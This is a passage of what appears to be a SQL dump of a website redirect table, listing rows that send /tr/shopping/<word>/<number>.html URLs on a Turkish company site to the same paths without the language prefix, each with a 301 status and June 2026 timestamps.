00:00:00',301),(77795,'https://3s-technologies.com.tr/tr/shopping/glump/389519771.html',NULL,'https://3s-technologies.com.tr/shopping/glump/389519771.html','',1,0,'2026-06-11 10:26:52','0000-00-00 00:00:00',301),(77796,'https://3s-technologies.com.tr/tr/shopping/goddaughter/2818677107.html',NULL,'https://3s-technologies.com.tr/shopping/goddaughter/2818677107.html','',1,0,'2026-06-11 10:26:55','0000-00-00 00:00:00',301),(77797,'https://3s-technologies.com.tr/tr/shopping/blooding/1732422315.html',NULL,'https://3s-technologies.com.tr/shopping/blooding/1732422315.html','',1,0,'2026-06-11 10:26:58','0000-00-00 00:00:00',301),(77798,'https://3s-technologies.com.tr/tr/shopping/mexican/2941340684.html',NULL,'https://3s-technologies.com.tr/shopping/mexican/2941340684.html','',1,0,'2026-06-11 10:27:01','0000-00-00 00:00:00',301),(77799,'https://3s-technologies.com.tr/tr/shopping/scarcest/3853748753.html',NULL,'https://3s-technologies.com.tr/shopping/scarcest/3853748753.html','',1,0,'2026-06-11 10:27:04','0000-00-00 00:00:00',301),(77800,'https://3s-technologies.com.tr/tr/shopping/squierie/3925660605.html',NULL,'https://3s-technologies.com.tr/shopping/squierie/3925660605.html','',1,0,'2026-06-11 10:27:07','0000-00-00 00:00:00',301),(77801,'https://3s-technologies.com.tr/tr/shopping/quinze/666765892.html',NULL,'https://3s-technologies.com.tr/shopping/quinze/666765892.html','',1,0,'2026-06-11 10:27:10','0000-00-00 00:00:00',301),(77802,'https://3s-technologies.com.tr/tr/shopping/kathetal/735204970.html',NULL,'https://3s-technologies.com.tr/shopping/kathetal/735204970.html','',1,0,'2026-06-11 10:27:13','0000-00-00 00:00:00',301),(77803,'https://3s-technologies.com.tr/tr/shopping/fathead/2906121711.html',NULL,'https://3s-technologies.com.tr/shopping/fathead/2906121711.html','',1,0,'2026-06-11 10:27:16','0000-00-00 00:00:00',301),(77804,'https://3s-technologies.com.tr/tr/shopping/hyperotreti/1228413123.html',NULL,'https://3s-technologies.com.tr/shopping/hyperotreti/1228413123.html','',1,0,'2026-06-11 10:27:26','0000-00-00 00:00:00',301),(77805,'https://3s-technologies.com.tr/tr/shopping/galactophorous/2160734671.html',NULL,'https://3s-technologies.com.tr/shopping/galactophorous/2160734671.html','',1,0,'2026-06-11 10:27:27','0000-00-00 00:00:00',301),(77806,'https://3s-technologies.com.tr/tr/shopping/allhallowtide/744987496.html',NULL,'https://3s-technologies.com.tr/shopping/allhallowtide/744987496.html','',1,0,'2026-06-11 10:27:30','0000-00-00 00:00:00',301),(77807,'https://3s-technologies.com.tr/tr/shopping/gasconader/4129970921.html',NULL,'https://3s-technologies.com.tr/shopping/gasconader/4129970921.html','',1,0,'2026-06-11 10:27:33','0000-00-00 00:00:00',301),(77808,'https://3s-technologies.com.tr/tr/shopping/middleman/1882815363.html',NULL,'https://3s-technologies.com.tr/shopping/middleman/1882815363.html','',1,0,'2026-06-11 10:27:36','0000-00-00 00:00:00',301),(77809,'https://3s-technologies.com.tr/tr/shopping/philatelist/4166567715.html',NULL,'https://3s-technologies.com.tr/shopping/philatelist/4166567715.html','',1,0,'2026-06-11 10:27:39','0000-00-00 00:00:00',301),(77810,'https://3s-technologies.com.tr/tr/shopping/deturb/3967285399.html',NULL,'https://3s-technologies.com.tr/shopping/deturb/3967285399.html','',1,0,'2026-06-11 10:27:42','0000-00-00 00:00:00',301),(77811,'https://3s-technologies.com.tr/tr/shopping/abelonian/3618571052.html',NULL,'https://3s-technologies.com.tr/shopping/abelonian/3618571052.html','',1,0,'2026-06-11 10:27:45','0000-00-00 00:00:00',301),(77812,'https://3s-technologies.com.tr/tr/shopping/lithocarpus/2720330925.html',NULL,'https://3s-technologies.com.tr/shopping/lithocarpus/2720330925.html','',1,0,'2026-06-11 10:27:48','0000-00-00 00:00:00',301),(77813,'https://3s-technologies.com.tr/tr/shopping/pentosan/1457600360.html',NULL,'https://3s-technologies.com.tr/shopping/pentosan/1457600360.html','',1,0,'2026-06-11 10:27:51','0000-00-00 00:00:00',301),(77814,'https://3s-technologies.com.tr/tr/shopping/vivify/1692614538.html',NULL,'https://3s-technologies.com.tr/shopping/vivify/1692614538.html','',1,0,'2026-06-11 10:27:54','0000-00-00 00:00:00',301),(77815,'https://3s-technologies.com.tr/tr/shopping/hamati/3793000318.html',NULL,'https://3s-technologies.com.tr/shopping/hamati/3793000318.html','',1,0,'2026-06-11 10:27:57','0000-00-00 00:00:00',301),(77816,'https://3s-technologies.com.tr/tr/shopping/machete/995739948.html',NULL,'https://3s-technologies.com.tr/shopping/machete/995739948.html','',1,0,'2026-06-11 10:28:01','0000-00-00 00:00:00',301),(77817,'https://3s-technologies.com.tr/tr/shopping/lacerating/1864425068.html',NULL,'https://3s-technologies.com.tr/shopping/lacerating/1864425068.html','',1,0,'2026-06-11 10:28:03','0000-00-00 00:00:00',301),(77818,'https://3s-technologies.com.tr/tr/shopping/burghal/1331182387.html',NULL,'https://3s-technologies.com.tr/shopping/burghal/1331182387.html','',1,0,'2026-06-11 10:28:10','0000-00-00 00:00:00',301),(77819,'https://3s-technologies.com.tr/tr/shopping/shabbing/3893770698.html',NULL,'https://3s-technologies.com.tr/shopping/shabbing/3893770698.html','',1,0,'2026-06-11 10:28:13','0000-00-00 00:00:00',301),(77820,'https://3s-technologies.com.tr/tr/shopping/chrysarobin/1401882156.html',NULL,'https://3s-technologies.com.tr/shopping/chrysarobin/1401882156.html','',1,0,'2026-06-11 10:28:16','0000-00-00 00:00:00',301),(77821,'https://3s-technologies.com.tr/tr/shopping/cineraria/548854658.html',NULL,'https://3s-technologies.com.tr/shopping/cineraria/548854658.html','',1,0,'2026-06-11 10:28:19','0000-00-00 00:00:00',301),(77822,'https://3s-technologies.com.tr/tr/shopping/cricetomys/1759937618.html',NULL,'https://3s-technologies.com.tr/shopping/cricetomys/1759937618.html','',1,0,'2026-06-11 10:28:22','0000-00-00 00:00:00',301),(77823,'https://3s-technologies.com.tr/tr/shopping/chattel/1607519632.html',NULL,'https://3s-technologies.com.tr/shopping/chattel/1607519632.html','',1,0,'2026-06-11 10:28:25','0000-00-00 00:00:00',301),(77824,'https://3s-technologies.com.tr/tr/shopping/literation/1507404863.html',NULL,'https://3s-technologies.com.tr/shopping/literation/1507404863.html','',1,0,'2026-06-11 10:28:28','0000-00-00 00:00:00',301),(77825,'https://3s-technologies.com.tr/tr/shopping/tarsus/2801811103.html',NULL,'https://3s-technologies.com.tr/shopping/tarsus/2801811103.html','',1,0,'2026-06-11 10:28:33','0000-00-00 00:00:00',301),(77826,'https://3s-technologies.com.tr/tr/shopping/symphonic/3092686239.html',NULL,'https://3s-technologies.com.tr/shopping/symphonic/3092686239.html','',1,0,'2026-06-11 10:28:35','0000-00-00 00:00:00',301),(77827,'https://3s-technologies.com.tr/tr/shopping/capellane/2594052620.html',NULL,'https://3s-technologies.com.tr/shopping/capellane/2594052620.html','',1,0,'2026-06-11 10:28:39','0000-00-00 00:00:00',301),(77828,'https://3s-technologies.com.tr/tr/shopping/orrach/2284988038.html',NULL,'https://3s-technologies.com.tr/shopping/orrach/2284988038.html','',1,0,'2026-06-11 10:28:41','0000-00-00 00:00:00',301),(77829,'https://3s-technologies.com.tr/tr/shopping/unconclusive/420152155.html',NULL,'https://3s-technologies.com.tr/shopping/unconclusive/420152155.html','',1,0,'2026-06-11 10:28:44','0000-00-00 00:00:00',301),(77830,'https://3s-technologies.com.tr/tr/shopping/tidife/712752263.html',NULL,'https://3s-technologies.com.tr/shopping/tidife/712752263.html','',1,0,'2026-06-11 10:28:47','0000-00-00 00:00:00',301),(77831,'https://3s-technologies.com.tr/tr/shopping/dilatata/892742178.html',NULL,'https://3s-technologies.com.tr/shopping/dilatata/892742178.html','',1,0,'2026-06-11 10:28:50','0000-00-00 00:00:00',301),(77832,'https://3s-technologies.com.tr/tr/shopping/secernment/1124102515.html',NULL,'https://3s-technologies.com.tr/shopping/secernment/1124102515.html','',1,0,'2026-06-11 10:28:53','0000-00-00 00:00:00',301),(77833,'https://3s-technologies.com.tr/tr/shopping/outswear/347287796.html',NULL,'https://3s-technologies.com.tr/shopping/outswear/347287796.html','',1,0,'2026-06-11 10:28:57','0000-00-00 00:00:00',301),(77834,'https://3s-technologies.com.tr/tr/shopping/omicron/3844407638.html',NULL,'https://3s-technologies.com.tr/shopping/omicron/3844407638.html','',1,0,'2026-06-11 10:28:59','0000-00-00 00:00:00',301),(77835,'https://3s-technologies.com.tr/tr/shopping/strein/2026933732.html',NULL,'https://3s-technologies.com.tr/shopping/strein/2026933732.html','',1,0,'2026-06-11 10:29:03','0000-00-00 00:00:00',301),(77836,'https://3s-technologies.com.tr/tr/shopping/laestadia/47796825.html',NULL,'https://3s-technologies.com.tr/shopping/laestadia/47796825.html','',1,0,'2026-06-11 10:29:05','0000-00-00 00:00:00',301),(77837,'https://3s-technologies.com.tr/tr/shopping/palsical/3817713684.html',NULL,'https://3s-technologies.com.tr/shopping/palsical/3817713684.html','',1,0,'2026-06-11 10:29:08','0000-00-00 00:00:00',301),(77838,'https://3s-technologies.com.tr/tr/shopping/olefin/2411028304.html',NULL,'https://3s-technologies.com.tr/shopping/olefin/2411028304.html','',1,0,'2026-06-11 10:29:11','0000-00-00 00:00:00',301),(77839,'https://3s-technologies.com.tr/tr/shopping/muzziness/2632252247.html',NULL,'https://3s-technologies.com.tr/shopping/muzziness/2632252247.html','',1,0,'2026-06-11 10:29:17','0000-00-00 00:00:00',301),(77840,'https://3s-technologies.com.tr/tr/shopping/flocculate/4113827982.html',NULL,'https://3s-technologies.com.tr/shopping/flocculate/4113827982.html','',1,0,'2026-06-11 10:29:21','0000-00-00 00:00:00',301),(77841,'https://3s-technologies.com.tr/tr/shopping/furcifer/1552406346.html',NULL,'https://3s-technologies.com.tr/shopping/furcifer/1552406346.html','',1,0,'2026-06-11 10:29:24','0000-00-00 00:00:00',301),(77842,'https://3s-technologies.com.tr/tr/shopping/snowberry/623321834.html',NULL,'https://3s-technologies.com.tr/shopping/snowberry/623321834.html','',1,0,'2026-06-11 10:29:27','0000-00-00 00:00:00',301),(77843,'https://3s-technologies.com.tr/tr/shopping/erythrin/3571750305.html',NULL,'https://3s-technologies.com.tr/shopping/erythrin/3571750305.html','',1,0,'2026-06-11 10:29:30','0000-00-00 00:00:00',301),(77844,'https://3s-technologies.com.tr/tr/shopping/extemporize/168250388.html',NULL,'https://3s-technologies.com.tr/shopping/extemporize/168250388.html','',1,0,'2026-06-11 10:29:33','0000-00-00 00:00:00',301),(77845,'https://3s-technologies.com.tr/tr/shopping/nonunion/4128758822.html',NULL,'https://3s-technologies.com.tr/shopping/nonunion/4128758822.html','',1,0,'2026-06-11 10:29:36','0000-00-00 00:00:00',301),(77846,'https://3s-technologies.com.tr/tr/shopping/camphorated/3095110421.html',NULL,'https://3s-technologies.com.tr/shopping/camphorated/3095110421.html','',1,0,'2026-06-11 10:29:39','0000-00-00 00:00:00',301),(77847,'https://3s-technologies.com.tr/tr/shopping/argand/3311671060.html',NULL,'https://3s-technologies.com.tr/shopping/argand/3311671060.html','',1,0,'2026-06-11 10:29:42','0000-00-00 00:00:00',301),(77848,'https://3s-technologies.com.tr/tr/shopping/spoilable/660965021.html',NULL,'https://3s-technologies.com.tr/shopping/spoilable/660965021.html','',1,0,'2026-06-11 10:29:45','0000-00-00 00:00:00',301),(77849,'https://3s-technologies.com.tr/tr/shopping/sedum/3894982813.html',NULL,'https://3s-technologies.com.tr/shopping/sedum/3894982813.html','',1,0,'2026-06-11 10:29:48','0000-00-00 00:00:00',301),(77850,'https://3s-technologies.com.tr/tr/shopping/huntsup/776666273.html',NULL,'https://3s-technologies.com.tr/shopping/huntsup/776666273.html','',1,0,'2026-06-11 10:29:51','0000-00-00 00:00:00',301),(77851,'https://3s-technologies.com.tr/tr/shopping/noolbenger/2359291723.html',NULL,'https://3s-technologies.com.tr/shopping/noolbenger/2359291723.html','',1,0,'2026-06-11 10:29:54','0000-00-00 00:00:00',301),(77852,'https://3s-technologies.com.tr/tr/shopping/manicotti/3118775243.html',NULL,'https://3s-technologies.com.tr/shopping/manicotti/3118775243.html','',1,0,'2026-06-11 10:29:57','0000-00-00 00:00:00',301),(77853,'https://3s-technologies.com.tr/tr/shopping/plumbage/3850208541.html',NULL,'https://3s-technologies.com.tr/shopping/plumbage/3850208541.html','',1,0,'2026-06-11 10:30:04','0000-00-00 00:00:00',301),(77854,'https://3s-technologies.com.tr/tr/shopping/vituperate/1925047322.html',NULL,'https://3s-technologies.com.tr/shopping/vituperate/1925047322.html','',1,0,'2026-06-11 10:30:08','0000-00-00 00:00:00',301),(77855,'https://3s-technologies.com.tr/tr/shopping/submiss/820439560.html',NULL,'https://3s-technologies.com.tr/shopping/submiss/820439560.html','',1,0,'2026-06-11 10:30:11','0000-00-00 00:00:00',301),(77856,'https://3s-technologies.com.tr/tr/shopping/shaly/2258684850.html',NULL,'https://3s-technologies.com.tr/shopping/shaly/2258684850.html','',1,0,'2026-06-11 10:30:14','0000-00-00 00:00:00',301),(77857,'https://3s-technologies.com.tr/tr/shopping/secrecies/1962034882.html',NULL,'https://3s-technologies.com.tr/shopping/secrecies/1962034882.html','',1,0,'2026-06-11 10:30:17','0000-00-00 00:00:00',301),(77858,'https://3s-technologies.com.tr/tr/shopping/belligerence/2329384603.html',NULL,'https://3s-technologies.com.tr/shopping/belligerence/2329384603.html','',1,0,'2026-06-11 10:30:20','0000-00-00 00:00:00',301),(77859,'https://3s-technologies.com.tr/tr/shopping/heteracanth/52549152.html',NULL,'https://3s-technologies.com.tr/shopping/heteracanth/52549152.html','',1,0,'2026-06-11 10:30:23','0000-00-00 00:00:00',301),(77860,'https://3s-technologies.com.tr/tr/shopping/futurism/208874229.html',NULL,'https://3s-technologies.com.tr/shopping/futurism/208874229.html','',1,0,'2026-06-11 10:30:26','0000-00-00 00:00:00',301),(77861,'https://3s-technologies.com.tr/tr/shopping/orthotomy/1191556737.html',NULL,'https://3s-technologies.com.tr/shopping/orthotomy/1191556737.html','',1,0,'2026-06-11 10:30:29','0000-00-00 00:00:00',301),(77862,'https://3s-technologies.com.tr/tr/shopping/benedicite/2473762564.html',NULL,'https://3s-technologies.com.tr/shopping/benedicite/2473762564.html','',1,0,'2026-06-11 10:30:32','0000-00-00 00:00:00',301),(77863,'https://3s-technologies.com.tr/tr/shopping/cyanite/962229816.html',NULL,'https://3s-technologies.com.tr/shopping/cyanite/962229816.html','',1,0,'2026-06-11 10:30:38','0000-00-00 00:00:00',301),(77864,'https://3s-technologies.com.tr/tr/shopping/hearsay/298486493.html',NULL,'https://3s-technologies.com.tr/shopping/hearsay/298486493.html','',1,0,'2026-06-11 10:30:41','0000-00-00 00:00:00',301),(77865,'https://3s-technologies.com.tr/tr/shopping/sprag/2782031851.html',NULL,'https://3s-technologies.com.tr/shopping/sprag/2782031851.html','',1,0,'2026-06-11 10:30:44','0000-00-00 00:00:00',301),(77866,'https://3s-technologies.com.tr/tr/shopping/lycaeon/2481728041.html',NULL,'https://3s-technologies.com.tr/shopping/lycaeon/2481728041.html','',1,0,'2026-06-11 10:30:47','0000-00-00 00:00:00',301),(77867,'https://3s-technologies.com.tr/tr/shopping/journey/2903697497.html',NULL,'https://3s-technologies.com.tr/shopping/journey/2903697497.html','',1,0,'2026-06-11 10:30:56','0000-00-00 00:00:00',301),(77868,'https://3s-technologies.com.tr/tr/shopping/mightiness/1320398908.html',NULL,'https://3s-technologies.com.tr/shopping/mightiness/1320398908.html','',1,0,'2026-06-11 10:30:58','0000-00-00 00:00:00',301),(77869,'https://3s-technologies.com.tr/tr/shopping/titubate/2207718941.html',NULL,'https://3s-technologies.com.tr/shopping/titubate/2207718941.html','',1,0,'2026-06-11 10:31:05','0000-00-00 00:00:00',301),(77870,'https://3s-technologies.com.tr/tr/shopping/sacra/2379579840.html',NULL,'https://3s-technologies.com.tr/shopping/sacra/2379579840.html','',1,0,'2026-06-11 10:31:08','0000-00-00 00:00:00',301),(77871,'https://3s-technologies.com.tr/tr/shopping/coteau/3378994140.html',NULL,'https://3s-technologies.com.tr/shopping/coteau/3378994140.html','',1,0,'2026-06-11 10:31:11','0000-00-00 00:00:00',301),(77872,'https://3s-technologies.com.tr/tr/shopping/chilopoda/205334033.html',NULL,'https://3s-technologies.com.tr/shopping/chilopoda/205334033.html','',1,0,'2026-06-11 10:31:14','0000-00-00 00:00:00',301),(77873,'https://3s-technologies.com.tr/tr/shopping/onaye/123476116.html',NULL,'https://3s-technologies.com.tr/shopping/onaye/123476116.html','',1,0,'2026-06-11 10:31:16','0000-00-00 00:00:00',301),(77874,'https://3s-technologies.com.tr/tr/shopping/aedile/2668683319.html',NULL,'https://3s-technologies.com.tr/shopping/aedile/2668683319.html','',1,0,'2026-06-11 10:31:20','0000-00-00 00:00:00',301),(77875,'https://3s-technologies.com.tr/tr/shopping/encrust/1442374898.html',NULL,'https://3s-technologies.com.tr/shopping/encrust/1442374898.html','',1,0,'2026-06-11 10:31:22','0000-00-00 00:00:00',301),(77876,'https://3s-technologies.com.tr/tr/shopping/antiperistasis/940598501.html',NULL,'https://3s-technologies.com.tr/shopping/antiperistasis/940598501.html','',1,0,'2026-06-11 10:31:25','0000-00-00 00:00:00',301),(77877,'https://3s-technologies.com.tr/tr/shopping/testaceology/2171287869.html',NULL,'https://3s-technologies.com.tr/shopping/testaceology/2171287869.html','',1,0,'2026-06-11 10:31:28','0000-00-00 00:00:00',301),(77878,'https://3s-technologies.com.tr/tr/shopping/burhel/3257935627.html',NULL,'https://3s-technologies.com.tr/shopping/burhel/3257935627.html','',1,0,'2026-06-11 10:31:31','0000-00-00 00:00:00',301),(77879,'https://3s-technologies.com.tr/tr/shopping/brucine/853330420.html',NULL,'https://3s-technologies.com.tr/shopping/brucine/853330420.html','',1,0,'2026-06-11 10:31:34','0000-00-00 00:00:00',301),(77880,'https://3s-technologies.com.tr/tr/shopping/boroughmonger/3373029730.html',NULL,'https://3s-technologies.com.tr/shopping/boroughmonger/3373029730.html','',1,0,'2026-06-11 10:31:38','0000-00-00 00:00:00',301),(77881,'https://3s-technologies.com.tr/tr/shopping/discursively/1583854810.html',NULL,'https://3s-technologies.com.tr/shopping/discursively/1583854810.html','',1,0,'2026-06-11 10:31:41','0000-00-00 00:00:00',301),(77882,'https://3s-technologies.com.tr/tr/shopping/encroaching/3650579058.html',NULL,'https://3s-technologies.com.tr/shopping/encroaching/3650579058.html','',1,0,'2026-06-11 10:31:43','0000-00-00 00:00:00',301),(77883,'https://3s-technologies.com.tr/tr/shopping/englutted/3888804203.html',NULL,'https://3s-technologies.com.tr/shopping/englutted/3888804203.html','',1,0,'2026-06-11 10:31:48','0000-00-00 00:00:00',301),(77884,'https://3s-technologies.com.tr/tr/shopping/intermeddlesome/3068807233.html',NULL,'https://3s-technologies.com.tr/shopping/intermeddlesome/3068807233.html','',1,0,'2026-06-11 10:31:51','0000-00-00 00:00:00',301),(77885,'https://3s-technologies.com.tr/tr/shopping/vapid/1730257725.html',NULL,'https://3s-technologies.com.tr/shopping/vapid/1730257725.html','',1,0,'2026-06-11 10:31:54','0000-00-00 00:00:00',301),(77886,'https://3s-technologies.com.tr/tr/shopping/frangula/1725505398.html',NULL,'https://3s-technologies.com.tr/shopping/frangula/1725505398.html','',1,0,'2026-06-11 10:31:57','0000-00-00 00:00:00',301),(77887,'https://3s-technologies.com.tr/tr/shopping/bobbysocker/3657544421.html',NULL,'https://3s-technologies.com.tr/shopping/bobbysocker/3657544421.html','',1,0,'2026-06-11 10:32:00','0000-00-00 00:00:00',301),(77888,'https://3s-technologies.com.tr/tr/shopping/orvietan/2903533974.html',NULL,'https://3s-technologies.com.tr/shopping/orvietan/2903533974.html','',1,0,'2026-06-11 10:32:03','0000-00-00 00:00:00',301),(77889,'https://3s-technologies.com.tr/tr/shopping/timocracy/3084343039.html',NULL,'https://3s-technologies.com.tr/shopping/timocracy/3084343039.html','',1,0,'2026-06-11 10:32:06','0000-00-00 00:00:00',301),(77890,'https://3s-technologies.com.tr/tr/shopping/guernsey/2285940545.html',NULL,'https://3s-technologies.com.tr/shopping/guernsey/2285940545.html','',1,0,'2026-06-11 10:32:09','0000-00-00 00:00:00',301),(77891,'https://3s-technologies.com.tr/tr/shopping/acacin/508630120.html',NULL,'https://3s-technologies.com.tr/shopping/acacin/508630120.html','',1,0,'2026-06-11 10:32:12','0000-00-00 00:00:00',301),(77892,'https://3s-technologies.com.tr/tr/shopping/hoten/2210143123.html',NULL,'https://3s-technologies.com.tr/shopping/hoten/2210143123.html','',1,0,'2026-06-11 10:32:15','0000-00-00 00:00:00',301),(77893,'https://3s-technologies.com.tr/tr/shopping/isatogenic/3775481741.html',NULL,'https://3s-technologies.com.tr/shopping/isatogenic/3775481741.html','',1,0,'2026-06-11 10:32:18','0000-00-00 00:00:00',301),(77894,'https://3s-technologies.com.tr/tr/shopping/aworking/3427241229.html',NULL,'https://3s-technologies.com.tr/shopping/aworking/3427241229.html','',1,0,'2026-06-11 10:32:21','0000-00-00 00:00:00',301),(77895,'https://3s-technologies.com.tr/tr/shopping/outwalk/1608731715.html',NULL,'https://3s-technologies.com.tr/shopping/outwalk/1608731715.html','',1,0,'2026-06-11 10:32:24','0000-00-00 00:00:00',301),(77896,'https://3s-technologies.com.tr/tr/shopping/washpot/4209880690.html',NULL,'https://3s-technologies.com.tr/shopping/washpot/4209880690.html','',1,0,'2026-06-11 10:32:29','0000-00-00 00:00:00',301),(77897,'https://3s-technologies.com.tr/tr/shopping/shoveling/1560535362.html',NULL,'https://3s-technologies.com.tr/shopping/shoveling/1560535362.html','',1,0,'2026-06-11 10:32:32','0000-00-00 00:00:00',301),(77898,'https://3s-technologies.com.tr/tr/shopping/evangelistic/219657740.html',NULL,'https://3s-technologies.com.tr/shopping/evangelistic/219657740.html','',1,0,'2026-06-11 10:32:35','0000-00-00 00:00:00',301),(77899,'https://3s-technologies.com.tr/tr/shopping/wailed/2103825138.html',NULL,'https://3s-technologies.com.tr/shopping/wailed/2103825138.html','',1,0,'2026-06-11 10:32:38','0000-00-00 00:00:00',301),(77900,'https://3s-technologies.com.tr/tr/shopping/sabine/4041230742.html',NULL,'https://3s-technologies.com.tr/shopping/sabine/4041230742.html','',1,0,'2026-06-11 10:32:41','0000-00-00 00:00:00',301),(77901,'https://3s-technologies.com.tr/tr/shopping/paronychia/892611063.html',NULL,'https://3s-technologies.com.tr/shopping/paronychia/892611063.html','',1,0,'2026-06-11 10:32:44','0000-00-00 00:00:00',301),(77902,'https://3s-technologies.com.tr/tr/shopping/furloughed/2486790680.html',NULL,'https://3s-technologies.com.tr/shopping/furloughed/2486790680.html','',1,0,'2026-06-11 10:32:47','0000-00-00 00:00:00',301),(77903,'https://3s-technologies.com.tr/tr/shopping/henotheism/1567711871.html',NULL,'https://3s-technologies.com.tr/shopping/henotheism/1567711871.html','',1,0,'2026-06-11 10:32:50','0000-00-00 00:00:00',301),(77904,'https://3s-technologies.com.tr/tr/shopping/motored/2214946154.html',NULL,'https://3s-technologies.com.tr/shopping/motored/2214946154.html','',1,0,'2026-06-11 10:32:53','0000-00-00 00:00:00',301),(77905,'https://3s-technologies.com.tr/tr/shopping/estate/3332271704.html',NULL,'https://3s-technologies.com.tr/shopping/estate/3332271704.html','',1,0,'2026-06-11 10:32:56','0000-00-00 00:00:00',301),(77906,'https://3s-technologies.com.tr/tr/shopping/tresayle/2028014748.html',NULL,'https://3s-technologies.com.tr/shopping/tresayle/2028014748.html','',1,0,'2026-06-11 10:32:59','0000-00-00 00:00:00',301),(77907,'https://3s-technologies.com.tr/tr/shopping/gaseity/2653016430.html',NULL,'https://3s-technologies.com.tr/shopping/gaseity/2653016430.html','',1,0,'2026-06-11 10:33:02','0000-00-00 00:00:00',301),(77908,'https://3s-technologies.com.tr/tr/shopping/dolium/2757154946.html',NULL,'https://3s-technologies.com.tr/shopping/dolium/2757154946.html','',1,0,'2026-06-11 10:33:05','0000-00-00 00:00:00',301),(77909,'https://3s-technologies.com.tr/tr/shopping/promulge/3966073300.html',NULL,'https://3s-technologies.com.tr/shopping/promulge/3966073300.html','',1,0,'2026-06-11 10:33:11','0000-00-00 00:00:00',301),(77910,'https://3s-technologies.com.tr/tr/shopping/homological/1606403618.html',NULL,'https://3s-technologies.com.tr/shopping/homological/1606403618.html','',1,0,'2026-06-11 10:33:14','0000-00-00 00:00:00',301),(77911,'https://3s-technologies.com.tr/tr/shopping/legatine/1927375451.html',NULL,'https://3s-technologies.com.tr/shopping/legatine/1927375451.html','',1,0,'2026-06-11 10:33:17','0000-00-00 00:00:00',301),(77912,'https://3s-technologies.com.tr/tr/shopping/bijugate/2161946770.html',NULL,'https://3s-technologies.com.tr/shopping/bijugate/2161946770.html','',1,0,'2026-06-11 10:33:20','0000-00-00 00:00:00',301),(77913,'https://3s-technologies.com.tr/tr/shopping/goemin/3475568681.html',NULL,'https://3s-technologies.com.tr/shopping/goemin/3475568681.html','',1,0,'2026-06-11 10:33:25','0000-00-00 00:00:00',301),(77914,'https://3s-technologies.com.tr/tr/shopping/confectioners/585285730.html',NULL,'https://3s-technologies.com.tr/shopping/confectioners/585285730.html','',1,0,'2026-06-11 10:33:28','0000-00-00 00:00:00',301),(77915,'https://3s-technologies.com.tr/tr/shopping/trichobranchia/736417085.html',NULL,'https://3s-technologies.com.tr/shopping/trichobranchia/736417085.html','',1,0,'2026-06-11 10:33:32','0000-00-00 00:00:00',301),(77916,'https://3s-technologies.com.tr/tr/shopping/selenonium/3754560405.html',NULL,'https://3s-technologies.com.tr/shopping/selenonium/3754560405.html','',1,0,'2026-06-11 10:33:37','0000-00-00 00:00:00',301),(77917,'https://3s-technologies.com.tr/tr/shopping/porphyra/2215077253.html',NULL,'https://3s-technologies.com.tr/shopping/porphyra/2215077253.html','',1,0,'2026-06-11 10:33:40','0000-00-00 00:00:00',301),(77918,'https://3s-technologies.com.tr/tr/shopping/disembroil/1405422368.html',NULL,'https://3s-technologies.com.tr/shopping/disembroil/1405422368.html','',1,0,'2026-06-11 10:33:43','0000-00-00 00:00:00',301),(77919,'https://3s-technologies.com.tr/tr/shopping/trompe/1872047981.html',NULL,'https://3s-technologies.com.tr/shopping/trompe/1872047981.html','',1,0,'2026-06-11 10:33:46','0000-00-00 00:00:00',301),(77920,'https://3s-technologies.com.tr/tr/shopping/discredit/1302749232.html',NULL,'https://3s-technologies.com.tr/shopping/discredit/1302749232.html','',1,0,'2026-06-11 10:33:49','0000-00-00 00:00:00',301),(77921,'https://3s-technologies.com.tr/tr/shopping/forded/3005955507.html',NULL,'https://3s-technologies.com.tr/shopping/forded/3005955507.html','',1,0,'2026-06-11 10:33:52','0000-00-00 00:00:00',301),(77922,'https://3s-technologies.com.tr/tr/shopping/collectively/1954858357.html',NULL,'https://3s-technologies.com.tr/shopping/collectively/1954858357.html','',1,0,'2026-06-11 10:33:55','0000-00-00 00:00:00',301),(77923,'https://3s-technologies.com.tr/tr/shopping/sublapsarian/1714721919.html',NULL,'https://3s-technologies.com.tr/shopping/sublapsarian/1714721919.html','',1,0,'2026-06-11 10:33:58','0000-00-00 00:00:00',301),(77924,'https://3s-technologies.com.tr/tr/shopping/remembered/771076500.html',NULL,'https://3s-technologies.com.tr/shopping/remembered/771076500.html','',1,0,'2026-06-11 10:34:01','0000-00-00 00:00:00',301),(77925,'https://3s-technologies.com.tr/tr/shopping/cirri/1615559625.html',NULL,'https://3s-technologies.com.tr/shopping/cirri/1615559625.html','',1,0,'2026-06-11 10:34:04','0000-00-00 00:00:00',301),(77926,'https://3s-technologies.com.tr/tr/shopping/acetosella/3579715766.html',NULL,'https://3s-technologies.com.tr/shopping/acetosella/3579715766.html','',1,0,'2026-06-11 10:34:08','0000-00-00 00:00:00',301),(77927,'https://3s-technologies.com.tr/tr/shopping/incaverned/3734435811.html',NULL,'https://3s-technologies.com.tr/shopping/incaverned/3734435811.html','',1,0,'2026-06-11 10:34:10','0000-00-00 00:00:00',301),(77928,'https://3s-technologies.com.tr/tr/shopping/braunite/2793586018.html',NULL,'https://3s-technologies.com.tr/shopping/braunite/2793586018.html','',1,0,'2026-06-11 10:34:13','0000-00-00 00:00:00',301),(77929,'https://3s-technologies.com.tr/tr/shopping/creed/2529153738.html',NULL,'https://3s-technologies.com.tr/shopping/creed/2529153738.html','',1,0,'2026-06-11 10:34:16','0000-00-00 00:00:00',301),(77930,'https://3s-technologies.com.tr/tr/shopping/hordeum/2794798101.html',NULL,'https://3s-technologies.com.tr/shopping/hordeum/2794798101.html','',1,0,'2026-06-11 10:34:19','0000-00-00 00:00:00',301),(77931,'https://3s-technologies.com.tr/tr/shopping/unisonant/1731469824.html',NULL,'https://3s-technologies.com.tr/shopping/unisonant/1731469824.html','',1,0,'2026-06-11 10:34:22','0000-00-00 00:00:00',301),(77932,'https://3s-technologies.com.tr/tr/shopping/thiamine/129440542.html',NULL,'https://3s-technologies.com.tr/shopping/thiamine/129440542.html','',1,0,'2026-06-11 10:34:25','0000-00-00 00:00:00',301),(77933,'https://3s-technologies.com.tr/tr/shopping/ambulatory/2895568513.html',NULL,'https://3s-technologies.com.tr/shopping/ambulatory/2895568513.html','',1,0,'2026-06-11 10:34:28','0000-00-00 00:00:00',301),(77934,'https://3s-technologies.com.tr/tr/shopping/thwartness/2554244859.html',NULL,'https://3s-technologies.com.tr/shopping/thwartness/2554244859.html','',1,0,'2026-06-11 10:34:31','0000-00-00 00:00:00',301),(77935,'https://3s-technologies.com.tr/tr/shopping/nematelminthea/4088346127.html',NULL,'https://3s-technologies.com.tr/shopping/nematelminthea/4088346127.html','',1,0,'2026-06-11 10:34:34','0000-00-00 